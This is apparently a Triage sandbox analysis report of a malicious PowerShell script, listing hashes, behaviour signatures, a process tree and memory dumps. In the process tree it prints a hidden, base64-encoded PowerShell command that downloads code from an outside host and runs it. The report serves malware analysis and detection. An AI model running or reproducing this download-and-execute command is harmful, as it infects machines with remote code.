d58dc2ab26df5783442b79e3edb7826599494b28f3c75fa3823cbc876f3707da | Triage

Analysis

max time kernel
25s
max time network
126s
platform
windows10_x64
resource
win10v20210408
submitted
25-08-2021 20:27

Sharing

Report Analysis Logs

General

Target

work.ps1
Size

1.4MB
MD5

7ba4b5c5d3e3276a3cfe8d581cf7173b
SHA1

79ba87b46562e75f097c1b6d23d3b63b9160bbaa
SHA256

73737bf28fa00ea1380bf98a76f6c2ff34bf25e8b489750acccc45df8e898022
SHA512

ccccc4402edc1c333f2b11955b4c2850f5b68674e473d57521cb009e2047a46f9c57c0151b9191d4a2e3b10931723d0191bba9b299ffb3bb293ff7d6f83598c6

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
12	2092	powershell.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1316	2092	WerFault.exe	79

Suspicious behavior: EnumeratesProcesses 21 IoCs

pid	Process
4044	powershell.exe
4044	powershell.exe
4044	powershell.exe
2092	powershell.exe
2092	powershell.exe
2092	powershell.exe
1316	WerFault.exe
1316	WerFault.exe
1316	WerFault.exe
1316	WerFault.exe
1316	WerFault.exe
1316	WerFault.exe
1316	WerFault.exe
1316	WerFault.exe
1316	WerFault.exe
1316	WerFault.exe
1316	WerFault.exe
1316	WerFault.exe
1316	WerFault.exe
1316	WerFault.exe
1316	WerFault.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4044	powershell.exe
Token: SeDebugPrivilege	2092	powershell.exe
Token: SeDebugPrivilege	1316	WerFault.exe

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 4044 wrote to memory of 2092	4044	powershell.exe	79
PID 4044 wrote to memory of 2092	4044	powershell.exe	79

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\work.ps1
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4044
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -enc JABNAD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAnAGgAdAB0AHAAOgAvAC8AYQB0AGgAaQBuAGcAYwBhAGwAbABlAGQAYwBhAGsAZQAuAGMAbwBtAC8AZgBpAGwAZQAnACkAOwAkAHQAPQAkAE0ALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAKAApADsAJABSAD0AJAB0AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACgAKQA7ACQARgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAgACQAUgA7ACQAcAA9ACQARgAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AGkAZQB4ACgAJABwACkAOwAgAA==
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2092
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 2092 -s 2488
    3⤵
    - Program crash
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1316

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2092-176-0x000001FE45040000-0x000001FE45042000-memory.dmp

Filesize
8KB

Download
memory/2092-177-0x000001FE45043000-0x000001FE45045000-memory.dmp

Filesize
8KB

Download
memory/2092-181-0x000001FE45046000-0x000001FE45048000-memory.dmp

Filesize
8KB

Download
memory/4044-118-0x0000024BA6130000-0x0000024BA6131000-memory.dmp

Filesize
4KB

Download
memory/4044-121-0x0000024BA6330000-0x0000024BA6331000-memory.dmp

Filesize
4KB

Download
memory/4044-122-0x0000024BA61A0000-0x0000024BA61A2000-memory.dmp

Filesize
8KB

Download
memory/4044-123-0x0000024BA61A3000-0x0000024BA61A5000-memory.dmp

Filesize
8KB

Download
memory/4044-142-0x0000024BA61A6000-0x0000024BA61A8000-memory.dmp

Filesize
8KB

Download
memory/4044-180-0x0000024BA61A8000-0x0000024BA61A9000-memory.dmp

Filesize
4KB

Download